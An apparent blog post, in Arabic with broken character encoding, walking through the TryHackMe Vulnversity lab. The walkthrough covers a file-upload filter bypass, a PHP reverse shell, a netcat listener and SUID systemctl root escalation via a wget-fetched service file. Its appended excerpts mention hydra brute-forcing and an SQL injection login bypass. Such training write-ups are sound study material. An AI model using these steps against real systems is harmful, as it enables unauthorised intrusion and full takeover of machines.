Search ๐Ÿ”Ž๐Ÿ–ฅ️

TryHackMe|Vulnversity WriteUp\Walkthrough (Arabic)

By

 ุจุณู… ุงู„ู„ู‡

ุงู„ู„ูŠ ูŠุจุบู‰ ูŠุดูˆู ุงู„ุญู„ ู…ุดุฑูˆุญ ููŠุฏูŠูˆ ูŠุฑุฌุน ู„ู„ููŠุฏูŠูˆ ุนู„ู‰ ู‚ู†ุงุชูŠ ุจุงู„ูŠูˆุชูŠูˆุจ ุนู„ู‰ ู‡ุฐุง ุงู„ุฑุงุจุท:



ุฑุงุจุท ุงู„ุชุญุฏูŠ: https://tryhackme.com/r/room/vulnversity

===============================================================

ูƒู„ู…ุฉ IP ููŠ ูƒู„ ุงู„ูƒูˆู…ุงู†ุฏุฒ ุงู„ู„ูŠ ุฃูƒุชุจู‡ุง ุชُุณุชุจุฏู„ ุจุงู„ู€IP ู„ู„ู…ุดูŠู† ุญู‚ุชูƒู… ุนู„ู‰ TryHackMe

ุฃูˆู„ ุญุงุฌุฉ ู†ุดุบู„ ุงู„ู€machine ูˆู†ุชุฃูƒุฏ ุฅู†ู†ุง ุงุชุตู„ู†ุง ุจุดุจูƒุฉ TryHackMe ูˆุงู„ุงุชุตุงู„ ู…ุถุจูˆุท، ุจุนุฏูŠู† ู†ุจุฏุฃ ุจุฃูˆู„ ุฎุทูˆุฉ ู„ู„ุญู„ ูˆู‡ูŠ ุฅู†ู†ุง ู†ุณูˆูŠ scan ู„ู„ุดุจูƒุฉ ุจุงุณุชุฎุฏุงู… nmap

sudo nmap IP -vv

ุทู„ุน ู…ุนุงู†ุง 6 ุจุฑูˆุชุงุช ุงู„ู„ูŠ ู‡ูŠ 21،22، 139، 445، 3128،3333 ู†ุฑุฌุน ู†ุณูˆูŠ Aggressive ุณูƒุงู† ุนู„ู‰ ู†ูุณ ู‡ุฐู‡ ุงู„ุจูˆุฑุชุงุช 

sudo nmap IP -vv -A -p 21,22,139,445,3128,3333

ุทู„ุน ู…ุนุงู†ุง ู…ุนู„ูˆู…ุงุช ูƒุซูŠุฑุฉ ู†ู‚ุฏุฑ ู…ู† ุฎู„ุงู„ู‡ุง ู†ุฌุงูˆุจ ุนู„ู‰ ุฃูˆู„ ุงู„ุฃุณุฆู„ุฉ ุจุงู„ุชุญุฏูŠ، ุฌู…ูŠุน ุงู„ุฅุฌุงุจุงุช ุชู„ู‚ูˆู†ู‡ุง ุฃุณูู„ ุงู„ุตูุญุฉ ู†ู‡ุงูŠุฉ ุงู„ุญู„. 

ุงู„ุจุฑูˆูƒุณูŠ ุดุบุงู„ ุนู„ู‰ ุจูˆุฑุช 3128 ูˆุฑู‚ู… ุงู„ู†ุณุฎุฉ ู‡ูˆ 3.5.12.

ู†ุธุงู… ุงู„ุชุดุบูŠู„ ู‡ูˆ Ubuntu ูˆุนุฑูู†ุง ู‡ุฐุง ู…ู† ุฎู„ุงู„ ู‚ุฑุงุกุชู†ุง ู„ู„ู€version ุนู„ู‰ ุจูˆุฑุช 22. 

ุงู„ูˆูŠุจ ุณูŠุฑููŠุฑ ูŠุชุดุบู„ ุนู„ู‰ ุจูˆุฑุช 3333

ุจู†ุจุฏุฃ ุจุจูˆุฑุช 3333 ุจู…ุง ุฅู† ุฒูŠ ู…ูˆ ูˆุงุถุญ ู…ู† ู†ุชุงุฆุฌ ุงู„ุณูƒุงู† ู…ูˆุฌูˆุฏ ุนู„ูŠู‡ุง Apache Server، ูˆุซุบุฑุงุช ุงู„ูˆูŠุจ ุนุฏูŠุฏุฉ ูˆููŠู‡ ู…ู†ู‡ุง ุงู„ุณู‡ู„، ูุจู†ุฏุฎู„ ูˆู†ุดูˆู ุงู„ุตูุญุฉ. 

ุนู„ู‰ ุงู„ู…ุชุตูุญ ุทู„ุน ู…ุนุงู†ุง ู…ูˆู‚ุน ุฌุงู…ุนูŠ ุนุงุฏูŠ ุฌุฏุง ู…ุง ููŠู‡ ุดูŠุก ู…ู…ูŠุฒ، ูˆู„ูˆ ุฌุฑุจุชูˆุง ุชุถุบุทูˆู† ุนู„ู‰ ุงู„ุตูุญุงุช ุงู„ู…ุฎุชู„ูุฉ ูˆุงู„ุฑูˆุงุจุท ู…ุง ุจุชุทู„ุนูˆู† ุจุดูŠุก، ู„ุฐู„ูƒ ุจู†ุณูˆูŠ directory enumeration ุจุงุณุชุฎุฏุงู… gobuster

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP:3333/ -t 64

ุทู„ุน ู…ุนุงู†ุง ู…ุณุงุฑุงุช ู…ุชุนุฏุฏุฉ، ุงู„ู…ُู„ูุช ู‡ูˆ internal، ู†ุฑูˆุญ ู„ู„ู…ุชุตูุญ ูˆู†ุฏุฎู„ ุนู„ู‰ ุตูุญุฉ internal

ุจู†ู„ุงู‚ูŠ ููŠ ุงู„ุตูุญุฉ ู†ู…ูˆุฐุฌ ู„ุฑูุน ุงู„ู…ู„ูุงุช، ู‡ุฐุง ุดูŠุก ุฑุงุงุงุงุฆุน، ูุนู„ุทูˆู„ ุจู†ุงุฎุฐ web shell ูˆู†ุฑูุนู‡ุง ุนู„ู‰ ุงู„ู…ูˆู‚ุน، ุฃู†ุง ุงุณุชุฎุฏู…ุช ุงู„ู€pentestmonkey php shell ุฃุฎุฐุชู‡ุง ู…ู† ุงู„ู…ูˆู‚ุน revshells ูˆู‡ูˆ ู…ูˆู‚ุน ู…ู…ุชุงุฒ ูˆูŠุฎู„ูŠูƒ ุชุญุตู„ ุนู„ู‰ shell ุจุณู‡ูˆู„ุฉ ูˆูŠุฌู…ุน ุงู„ุฃู†ูˆุงุน ุจู…ูƒุงู† ูˆุงุญุฏ.

ู†ุฑุฌุน ุนู„ู‰ ู†ุธุงู…ู†ุง ูˆู†ุญูุธ ุงู„ู€Shell ููŠ ู…ู„ู ูˆู†ุณู…ูŠู‡ shell.php، ุจุนุฏูŠู† ู†ุฑูˆุญ ุนู„ู‰ internal ูˆู†ุฑูุน ุงู„ู€shell. 

ู‡ู†ุง ูˆุงุฌู‡ุชู†ุง ู…ุดูƒู„ุฉ، ูˆู‡ูˆ ุฅู†ู‡ ุงู„ู€extension ู…ُูู„ุชَุฑ، ูู…ุนู†ุงุชู‡ ู…ุง ุฃู‚ุฏุฑ ุฃุฑูุน ู…ู„ูุงุช php ุนู„ู‰ ุงู„ู†ุธุงู…، ู„ูƒู† ููŠู‡ ุญู„، ูˆู‡ูˆ ุฅู†ู‡ ู…ูˆ ุดุฑุท ุฃุณุชุฎุฏู… php ุจุนูŠู†ู‡ุง، ููŠ extensions ุชู†ูุน ุบูŠุฑู‡ุง ู…ุซู„ php4، php3، phtml. ู…ู…ูƒู† ุฅู†ู†ุง ู†ุฌุฑุจ ุฌู…ูŠุน ู‡ุฐู‡ ุงู„ุงู…ุชุฏุงุฏุงุช ุนู† ุทุฑูŠู‚ ุฅู†ู†ุง ูƒู„ ู…ุฑุฉ ู†ุญูุธ ุงู„ู…ู„ู ุจุงู…ุชุฏุงุฏ ู…ุฎุชู„ู، ุซู… ู†ุฑุฌุน ู„ู„ุตูุญุฉ ูˆู†ุฑูุน ุงู„ู…ู„ู ูˆู†ุดูˆู ูŠู†ู‚ุจู„ ุฃูˆ ู„ุง، ู„ูƒู† ููŠ ุทุฑูŠู‚ุฉ ุฃุณุฑุน ุจุงุณุชุฎุฏุงู… burpsuite. 

ุฃูˆู„ ุดูŠุก ุจู†ุญูุธ ุงู„ุงู…ุชุฏุงุฏุงุช ุงู„ู€4 ุงู„ู„ูŠ ูƒุชุจู†ุงู‡ุง ููˆู‚ ููŠ ู…ู„ู، ูƒู„ ุงู…ุชุฏุงุฏ ููŠ ุณุทุฑ ู„ูˆุญุฏู‡، ูˆุดู…ู„ู†ุง php ู…ุน ุฅู†ู‡ ู†ุนุฑู ู…ุง ุจูŠู†ุฌุญ ู„ุขู† ุจู†ุฎู„ูŠู‡ ู„ู„ู…ู‚ุงุฑู†ุฉ، ูˆู†ุณู…ูŠ ู‡ุฐุง ุงู„ู…ู„ู ู…ุซู„ุง phpext، ุซู… ู…ู† foxy proxy ุนู„ู‰ ุงู„ู…ุชุตูุญ ู†ุฎุชุงุฑ burpsuite ุซู… ู†ูุชุญ burpsuite، ุจุนุฏ ูƒุฐุง ู†ุฑุฌุน ู†ุฑูุน ุงู„ู€php shell ู…ู† ุงู„ุตูุญุฉ ูˆู†ู„ุชู‚ุท ุงู„ุทู„ุจ، ู‡ูˆ ุฑุญ ูŠุฑูุถู‡ุง، ูˆู…ูˆ ู…ู‡ู…، ุงู„ู…ู‡ู… ุงู„ุขู† ุฅู†ู†ุง ู†ู„ุชู‚ุท ุงู„ุทู„ุจ ุนู„ู‰ burp. ุจู†ู„ู‚ู‰ ุงู„ุทู„ุจ ุชุญุช ู‚ุงุฆู…ุฉ proxy ุซู… HTTP history ูˆุจู†ู„ุงู‚ูŠ ุงู„ุทู„ุจ، ู†ุถุบุท ุจุฒุฑ ุงู„ูุฃุฑุฉ ุงู„ุฃูŠู…ู† ูˆู†ุฎุชุงุฑ send to intruder.

ู†ุฑูˆุญ ู„ู€intruder ุซู… ู†ุถุบุท ุนู„ู‰ § clear ุจุนุฏ ูƒุฐุง ู†ุญุฏุฏ ุนู„ู‰ ุงู…ุชุฏุงุฏ ุงู„ู…ู„ู ูู‚ุท ูˆู†ุถุบุท § add 

ู‡ุฐุง ู‚ุจู„ ู…ุง ู†ุถุบุท add

ูˆู‡ู†ุง ุจุนุฏ 

ุจุนุฏ ูƒุฐุง ู†ุฑูˆุญ ุนู„ู‰ ุงู„ู‚ุงุฆู…ุฉ ุงู„ูุฑุนูŠุฉ ุงู„ู„ูŠ ุงุณู…ู‡ุง payloads ูˆุชุญุช payload settings ู†ุถุบุท ุนู„ู‰ load ุซู… ุจูŠูุชุญ ู…ุนุงู†ุง ู†ุงูุฐุฉ ู„ู„ู…ูุงุช ุนู„ู‰ ุงู„ุฌู‡ุงุฒ، ู†ุฑูˆุญ ู„ู„ู…ู„ู phpext ุงู„ู„ูŠ ุฌู‡ุฒู†ุงู‡ ุจุงู„ุฃุนู„ู‰ ูˆู†ุฎุชุงุฑู‡. ุซู… ุจุชุชุญู…ู„ ู…ุนุงู†ุง ุงู„ุงู…ุชุฏุงุฏุงุช. 

ู†ุดูŠู„ ุงู„ุตุญ ู…ู† ุนู†ุฏ payload encoding ุซู… ู†ุถุบุท ุนู„ู‰ Start attack ููŠ ุฃุนู„ู‰ ุงู„ูŠู…ูŠู†. ุจูŠุจุฏุฃ ูŠุฑุณู„ ุทู„ุจ ุนู„ู‰ ูƒู„ ู…ู† ู‡ุฐู‡ ุงู„ุงู…ุชุฏุงุฏุงุช. ู…ู† ุงู„ู†ุชุงุฆุฌ ูˆุงุถุญ ุฅู† ูƒู„ู‡ุง ู†ูุณ ุงู„ุญุฌู… ู…ุง ุนุฏุง ูˆุงุญุฏ ู…ุฎุชู„ู ุงู„ู„ูŠ ู‡ูˆ phtml، ู„ุฐู„ูƒ ุจู†ุดูŠูƒ ุนู„ูŠู‡ ุฃูˆู„ ุดูŠุก. 

ุฅุฐุง ุดูู†ุง ุงู„ู€http response ุจู†ุดูˆู ูƒู„ู…ุฉ success ูˆู‡ุฐุง ูŠุนู†ูŠ ุฅู†ู‡ ูŠู‚ุจู„ ู‡ุฐุง ุงู„ุงู…ุชุฏุงุฏ.

ุงู„ู„ูŠ ุจู†ุณูˆูŠู‡ ุงู„ุขู† ุฅู†ู†ุง ุจู†ุฑูˆุญ ู„ู„ู…ู„ู ูˆู†ุบูŠุฑ ุงู…ุชุฏุงุฏู‡

mv shell.php shell.phtml

ู„ูˆ ููŠ ุดูŠุก ู…ูˆ ูˆุงุถุญ ู…ู…ูƒู† ุชุฑุฌุนูˆู† ู„ู…ู‚ุทุน ุงู„ุดุฑุญ ูˆุชุดูˆููˆู† ูƒูŠู ุชุณุชุฎุฏู…ูˆู† burpsuite ุจุงู„ุชูุตูŠู„ ููŠ ุงู„ู…ู‚ุทุน ุฃุนู„ุงู‡ ู…ู† ุงู„ุฏู‚ูŠู‚ุฉ 7:18 ุฅู„ู‰ ุฅู„ู‰ 10:50

ุฑูุนู†ุง ุงู„ู…ู„ู shell.phtml ูˆุงุฑุชูุน ูˆุถุจุท ู…ุนุงูŠ، ู„ูƒู† ุงู„ู…ุดูƒู„ุฉ ุฅู†ูŠ ู…ุง ุฃุนุฑู ูˆูŠู† ุฑุงุญ ุงู„ู…ู„ู، ุงู„ู„ูŠ ุฃุนุฑูู‡ ูู‚ุท ุฅู† ุงู„ุทู„ุจ ูŠุชู… ุฅุฑุณุงู„ู‡ ู„ู„ุตูุญุฉ internal، ู„ุฐู„ูƒ ุจู†ุฑุฌุน ู†ุณูˆูŠ gobuster ูˆู†ุดูˆู ูˆุด ููŠู‡ ู…ุณุงุฑุงุช ุชุญุช internal ู…ู…ูƒู† ู†ู„ุงู‚ูŠ ุงู„ู…ู„ู ุงู„ู„ูŠ ุฑูุนู†ุงู‡ ููŠู‡ุง. 

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP:3333/internal -t 64

ุทู„ุน ู…ุนุงู†ุง ุงู„ู…ุณุงุฑuploads ูŠุนู†ูŠ ุงุญุชู…ุงู„ %99.99 ุจู†ู„ุงู‚ูŠ ุงู„ู€shell ู‡ู†ุงูƒ، ู†ุฑูˆุญ ู„ู„ุตูุญุฉ ุนู„ู‰ ุงู„ู…ุชุตูุญ ูˆู‚ุจู„ ู…ุง ู†ุถุบุท ุนู„ู‰ ุงู„ุดูŠู„ ู†ุชุฃูƒุฏ ุฅู† ุงู„ู€Listener  ุดุบุงู„ ุนู„ู‰ ุฌู‡ุงุฒู†ุง

nc -nlvp 4444

ุซู… ู†ุถุบุท ุนู„ู‰ ุงู„ู€shell ูˆุจูŠูˆุตู„ ู„ู†ุง ุงุชุตุงู„ ู…ู† ุงู„ุถุญูŠุฉ ุนู„ู‰ ุฌู‡ุงุฒู†ุง، ูˆุจู…ุง ุฅู† ุงู„ู€victim  ุฌู‡ุงุฒ ู†ูˆุงุชู‡ linux ูุฌุฏุง ุณู‡ู„ ุฅู†ู†ุง ู†ุณูˆูŠ stabilization ู„ู„ู€shell، ุงูŠุด ูŠุนู†ูŠ؟ ูŠุนู†ูŠ ู†ุฎู„ูŠู‡ุง ู…ุชูŠู†ุฉ ูˆู…ุง ุชู‚ูู„ ุฃูˆู„ ู…ุง ู†ุถุบุท ctrl+c ูˆู†ู‚ุฏุฑ ู†ุณุชุฎุฏู… ุงู„ุฃุณู‡ู… ูˆ tab completion ูˆูƒุฐุง.

ุงู„ุฎุทูˆุงุช ูƒุงู„ุชุงู„ูŠ:

ู†ุดุบู„ ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ ุจุงุณุชุฎุฏุงู… python3 ุฅุฐุง ู…ุง ุถุจุท ุนุงุฏูŠ ู†ุฌุฑุจ python

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

ุจุนุฏูŠู† ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ

export TERM=xterm

ุซู… ู†ุถุบุท ุนู„ู‰ ุงู„ูƒูŠุจูˆุฑุฏ ctrl+z ุนุดุงู† ู†ุฎู„ูŠ ุงู„ู€shell ุชุฑุฌุน ู„ู„ุฎู„ููŠุฉ

ุงู„ุญูŠู† ู†ุฌูŠุจู‡ุง ู„ู‚ุฏุงู… ุจุงุณุชุฎุฏุงู… ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ

stty raw -echo;fg

ุงู„ุญูŠู† ุตุงุฑ ู…ุนุงู†ุง stable shell ู†ู‚ุฏุฑ ู†ุณุชุฎุฏู…ู‡ุง ุจุฑุงุญุชู†ุง ุจุฏูˆู† ู…ุง ู†ุฎุงู ุฅู†ู‡ุง ุชุทูŠุฑ ุฃูˆ ุชุทูุดู†ุง ุฅุฐุง ุฌูŠู†ุง ู†ู…ุณุญ ูˆู†ุนุฏู„ ุจุงู„ูƒู„ู…ุงุช. ุฅุฐุง ุฑุฌุนุช ู„ูƒู… ุงู„ู€shell  ู…ุงู‡ูŠ ู…ู†ุชุธู…ุฉ ูˆุจุงุฏูŠุฉ ู…ู† ู†ุต ุงู„ุณุทุฑ، ุจุณ ุดุบู„ูˆ ุฃูŠ ูƒูˆู…ุงู†ุฏ ู…ุซู„ id ูˆุจุชุฑุฌุน ุชุถุจุท ุจุฅุฐู† ุงู„ู„ู‡.

ุงู„ุขู† ุจู…ุง ุฅู†ู†ุง ุฏุงุฎู„ ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ، ุจู†ุฑูˆุญ ู„ู„ู€home ูˆู†ุดูˆู ูˆุด ุนู†ุฏูŠ ู…ุณุชุฎุฏู…ูŠู†

cd home

ls

ุนู†ุฏูŠ bill

cd bill

ls

ุจู†ู„ุงู‚ูŠ ุฃูˆู„ ูู„ุงู‚، ู†ุณุชุนุฑุถู‡

cat user.txt

ูˆุจูƒุฐุง ุญุตู„ู†ุง ุนู„ู‰ ุฃูˆู„ ูู„ุงู‚ ✨، ุซุงู†ูŠ ูู„ุงู‚ ูŠูƒูˆู† ุบุงู„ุจุง ููŠ root home directory ูˆุนุดุงู† ู†ู‚ุฏุฑ ู†ู‚ุฑุฃู‡ ูˆู†ูˆุตู„ ู„ู‡ ู†ุญุชุงุฌ ู†ุฑูุน ุตู„ุงุญูŠุงุชู†ุง، ูˆู‡ูˆ ุฃุนุทุงู†ูŠ ุชู„ู…ูŠุญุฉ ููŠ ุงู„ุณุคุงู„ ูˆู‚ุงู„ ุฅู†ู†ุง ุจู†ุณุชุฎุฏู… SUID binary، ูู†ุจุญุซ ุนู†ู‡ุง ููŠ ุงู„ู†ุธุงู… ุจุงุณุชุฎุฏุงู… 

find / -perm /4000 2>/dev/null

ุทู„ุน ู…ุนุงู†ุง binaries ูƒุซูŠุฑุฉ، ุงู„ู…ُู„ูุช ููŠู‡ุง ู‡ูˆ systemctl، ุนุดุงู† ู†ุจุญุซ ุนู† ุทุฑูŠู‚ุฉ ู†ุณุชุฎุฏู… ููŠู‡ุง ู‡ุฐุง ุงู„ุจุงูŠู†ุงุฑูŠ ู„ุฑูุน ุงู„ุตู„ุงุญูŠุงุช، ู†ูƒุชุจ ููŠ ู‚ูˆู‚ู„ 

systemctl privilege escalation

ููŠู‡ ุนุฏุฉ ู…ุตุงุฏุฑ، ู‡ุฐุง ุฌุฏุง ู…ู…ุชุงุฒ 

https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation

ุจู†ุณูˆูŠ ุฒูŠ ู…ุง ูŠุจุบู‰ ุจุงู„ุถุจุท، ุฃูˆู„ ุญุงุฌุฉ ุจู†ู†ุณุฎ ุงู„ุณูƒุฑูŠุจุช ุฒูŠ ู…ุงู‡ูˆ ูˆู†ุญูุธู‡ ููŠ ู…ู„ู ุนู„ู‰ ู†ุธุงู…ู†ุง، ูˆู†ุนุฏู„ ุนู„ู‰ ุงู„ู€IP ู†ุญุท ู…ูƒุงู†ู‡ ุนู†ูˆุงู† openVPN ู„ุฌู‡ุงุฒู†ุง، ูˆุจุงู‚ูŠ ุงู„ู…ุนู„ูˆู…ุงุช ุฒูŠ ู…ุงู‡ูŠ. 

ุจุนุฏ ูƒุฐุง ู†ู†ู‚ู„ ู‡ุฐุง ุงู„ุณูƒุฑูŠุจุช ุฅู„ู‰ ุงู„ุถุญูŠุฉ. ุฃูˆู„ ุดูŠุก ู†ุดุบู„ ุจุงูŠุซูˆู† ุณูŠุฑููŠุฑ ุนู„ู‰ ุงู„ู…ุฌู„ุฏ ุงู„ู„ูŠ ูŠุญุชูˆูŠ ุนู„ู‰ ุงู„ู…ู„ู ุงู„ู„ูŠ ู†ุจูŠ ู†ู†ู‚ู„ู‡

python3 -m http.server

ูˆุนู„ู‰ ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ู†ุฑูˆุญ ู„ู„ู€tmp ูˆู†ุญู…ู„ ุงู„ู…ู„ู ู‡ู†ุงูƒ

ุทูŠุจ ู„ูŠู‡ ุงุฎุชุฑุช ุงู„ู€tmp ؟؟

ุฃูˆู„ ุญุงุฌุฉ tmp ู‡ูˆ ู…ู„ู ูƒู„ ุงู„ู…ู„ูุงุช ุงู„ู„ูŠ ููŠู‡ ุชُู…ุณุญ ุชู„ู‚ุงุฆูŠุง ุนู†ุฏ ุฅุบู„ุงู‚ ุงู„ุฌู‡ุงุฒ، ูู…ุซู„ุง ู„ูˆ ูƒู†ุช ุชุดุชุบู„ ููŠ ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ูˆูุฌุฃุฉ ุชู‚ูู„، ุนู„ุทูˆู„ ุจูŠู†ู…ุณุญ ุฃูŠ ุดูŠุก ุญู…ู„ุชู‡ ู‡ู†ุงูƒ ุนู„ู‰ tmp ูˆูŠุตูŠุฑ ู…ุง ูŠุจู‚ู‰ ู„ูƒ ุฃุซุฑ. 

ุซุงู†ูŠ ุญุงุฌุฉ، ู„ู…ุง ู†ุดุชุบู„ ุนู„ู‰ ุฌู‡ุงุฒ ุฃูุถู„ ุฅู†ู†ุง ู†ุฌุนู„ ู…ู„ูุงุชู†ุง ู…ุญููˆุธุฉ ููŠ ู…ูƒุงู† ูˆุงุญุฏ، ู„ุณู‡ูˆู„ุฉ ุงู„ูˆุตูˆู„ ู„ู‡ุง ูˆู„ุณู‡ูˆู„ุฉ ู…ุณุญู‡ุง ูˆุงู„ุชุฎู„ุต ู…ู†ู‡ุง، ูˆูŠุง ุณู„ุงู… ู„ูˆ ูƒุงู† ู‡ุฐุง ุงู„ู…ูƒุงู† ู‡ูˆ ู…ู† ู†ูุณู‡ ูŠู…ุณุญ ุงู„ู„ูŠ ููŠู‡ ู„ูˆ ุชู… ุฅุบู„ุงู‚ ุงู„ุฌู‡ุงุฒ ุจุดูƒู„ ู…ูุงุฌุฆ. 

wget http://OpenVPN-IP:8000/root.service

ู†ุฑูˆุญ ุนู„ู‰ ุฌู‡ุงุฒู†ุง ูˆู†ุฌู‡ุฒ ุงู„ู€listener ูˆู†ุชุฃูƒุฏ ุฅู† ุฑู‚ู… ุงู„ุจูˆุฑุช ู†ูุณ ุงู„ู„ูŠ ู…ูˆุฌูˆุฏ ุนู„ู‰ ุงู„ู€Exploit ูˆู‡ูˆ 9999، 

ุซู… ู†ู†ูุฐ ุนู„ู‰ ุงู„ุถุญูŠุฉ ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏุฒ

/bin/systemctl enable /dev/shm/root.service

/bin/systemctl start root

ุฅุฐุง ูƒู„ ุดูŠุก ุชู…ุงู… ุงู„ู…ูุฑูˆุถ ูŠุฌูŠู†ุง ุงุชุตุงู„ ุนู„ู‰ ุฌู‡ุงุฒู†ุง ู…ู† ุงู„ุถุญูŠุฉ ูˆู„ูƒู† ุงู„ู€shell ู‡ุฐู‡ ุงู„ู…ุฑุฉ ุจุชูƒูˆู† ุจุตู„ุงุญูŠุงุช ุฑูˆูˆุช. ุฃูˆู„ ู…ุง ูŠุฌูŠู†ุง ุงู„ุงุชุตุงู„ ู†ุฑูˆุญ ู„ู…ุฌู„ุฏ ุฑูˆูˆุช ูˆู†ู‚ุฑุฃ ุงู„ูู„ุงู‚

cd /root

ls 

cat root.txt

ูˆุจูƒุฐุง ุงู†ุชู‡ูŠู†ุง ู…ู† ุงู„ุญู„ ูˆุญุตู„ู†ุง ุนู„ู‰ ุซุงู†ูŠ ูู„ุงู‚ ✨


ู‡ุฐู‡ ุฅุฌุงุจุงุช ุงู„ุฃุณุฆู„ุฉ ู…ุง ุนุฏุง ุงู„ูู„ุงู‚ุงุช:

Reconnaissance

ูƒู„ ุงู„ุฅุฌุงุจุงุช ู‡ู†ุง ู…ู† ุฎู„ุงู„ ู†ุชุงุฆุฌ ุงู„ู€Aggressive nmap scan ุญุตู„ู†ุง ุนู„ูŠู‡ุง

Locating directories using Gobuster

Compromise the Webserver

Privilege Escalation

Comments

Post a Comment

Popular posts from this blog

TryHackMe|Blog WriteUp\Walkthrough (Arabic)

By
Image
ุจุณู… ุงู„ู„ู‡ ุงู„ู„ูŠ ูŠุจุบู‰ ูŠุดูˆู ุงู„ุญู„ ู…ุดุฑูˆุญ ููŠุฏูŠูˆ ูŠุฑุฌุน ู„ู„ููŠุฏูŠูˆ ุนู„ู‰ ู‚ู†ุงุชูŠ ุจุงู„ูŠูˆุชูŠูˆุจ ุนู„ู‰ ู‡ุฐุง ุงู„ุฑุงุจุท: ุฑุงุจุท ุงู„ุชุญุฏูŠ:  https://tryhackme.com/r/room/blog ==================================================== ูƒู„ู…ุฉ IP ููŠ ูƒู„ ุงู„ูƒูˆู…ุงู†ุฏุฒ ุงู„ู„ูŠ ุฃูƒุชุจู‡ุง ุชُุณุชุจุฏู„ ุจุงู„ู€IP ู„ู„ู…ุดูŠู† ุญู‚ุชูƒู… ุนู„ู‰ TryHackMe ุฃูˆู„ ุญุงุฌุฉ ู†ุดุบู„ ุงู„ู€machine ูˆู†ุชุฃูƒุฏ ุฅู†ู†ุง ุงุชุตู„ู†ุง ุจุดุจูƒุฉ TryHackMe ูˆุงู„ุงุชุตุงู„ ู…ุถุจูˆุท، ุจุนุฏูŠู† ู†ุจุฏุฃ ุจุฃูˆู„ ุฎุทูˆุฉ ู„ู„ุญู„ ูˆู‡ูŠ ุฅู†ู†ุง ู†ุณูˆูŠ scan ู„ู„ุดุจูƒุฉ ุจุงุณุชุฎุฏุงู… nmap sudo nmap IP -vv ุทู„ุน ู…ุนุงู†ุง 4 ุจูˆุฑุชุงุช، ู†ุฑุฌุน ู†ุณูˆูŠ Aggressive ุณูƒุงู† ุนู„ูŠู‡ุง sudo nmap IP -vv -A -p 22,80,139,445 ุนู„ู‰ ุจูˆุฑุช 22 ุนู†ุฏู†ุง SSH ูˆู†ุธุงู… ุงู„ุชุดุบูŠู„ ู„ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ู‡ูˆ Ubuntu، ูˆุนู„ู‰ ุจูˆุฑุช 80 ุนู†ุฏู†ุง Apache server، ุฃู…ุง ุจูˆุฑุช 139 ูˆ 445 ู…ุชุนู„ู‚ุฉ ุจุงู„ู€smb. ุจุฑุถูˆ ุฃุนุทุงู†ุง ููŠ ุงู„ู†ุชุงุฆุฌ ุฅู† ุงู„ู€http generator ู‡ูˆ WordPress ูˆุจุฑุถูˆ ุฃุนุทุงู†ุง ุฑู‚ู… ุงู„ู†ุณุฎุฉ ูˆู‡ูˆ 5.0، ูˆู‡ุฐู‡ ู…ุนู„ูˆู…ุฉ ู…ููŠุฏุฉ ูˆู…ู‡ู…ุฉ.  ุฅุฐุง ุฒุฑู†ุง ุงู„ุตูุญุฉ ุนู„ู‰ ุจูˆุฑุช 80 ููŠ ุงู„ู…ุชุตูุญ، ุจู†ู„ุงู‚ูŠ ุจู„ูˆู‚ ู„ู„ู…ุณุชุฎุฏู… Billy ูˆููŠู‡ุง ุจูˆุณุชุงุช، ูˆู„ูƒู† ู…ุง ุจุฏุงุฎู„ ู‡ุฐู‡ ุงู„ุจูˆุณุชุงุช ุดูŠุก ู…ู‡ู….  ูˆ ุฒูŠ ู…ุง ู‚ุงู„ ู„ู†ุง ููŠ ุงู„ุชุญุฏูŠ، ุจู†ุถูŠู ุงู„ู…ูˆู‚ุน ุฅู„ู‰ ู…ู„ู etc/hosts/ ุนู„ู‰ ุงู„ุฌู‡ุงุฒ ุงู„ุญูŠู† ุจู†ุณุชููŠุฏ ู…ู† ุงู„ู€smb ุนู„ู‰ ุฌู‡ุงุฒ ุงู„ุถ...
Read more

TryHackMe|GoldenEye WriteUp\Walkthrough (English)

By
Image
Golden Eye Room Link: https://tryhackme.com/r/room/goldeneye   ===================================================== sudo nmap -p- -vv IP . You have 4 ports open 25,80,55006,55007. When you visit the website and look into the source code you will find a script terminal.js . If you take a look at the script you will find interesting notes.    We found a user boris and its encoded password. It is encoded with HTML escape and the decoded password is ********. Now use these credentials to login to /sev-home folder. The service on port 25 is smtp, and on 55006, 55007 is pop3. Some useful pop3 commands to know are: USER > To provide a username PASS > To provide a password LIST > To list the emails for a user RETR > To view the contents of an email Now with nc try to connect to port 55007 with the credentials you have it won’t work. So you will use hydra to get the password hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://IP:55007 . And you will get the...
Read more

TryHackMe|Gallery WriteUp\Walkthrough (English)

By
Image
Gallery Room Link:  https://tryhackme.com/r/room/gallery666 ================================================================ After the Nmap scan, you will see 2 ports open 80 and 8080. 8080 doesn’t have anything interesting. In 80 the main page has the home page for nginx server. Use gobuster to find any hidden directories. There is /gallery . In /gallery you have a login page. Try to see if sqli works on it.  Enter "  ‘ or ‘1’ = ‘1’ -- - "   in the username field and see if it allows you to get in, and it did :). Once you are in you can answer the second question which is the CMS, the website uses Simple Image Gallery. Although there is a known vulnerability for this, you don’t need it. Go to albums from the top horizontal menu. Then, click on any of the albums and upload a .php webshell, I used the one from pentestmonkey. Do not forget to change the IP into your IP and set up a netcat listener with the same port number as in the shell. Once you have your webshel...
Read more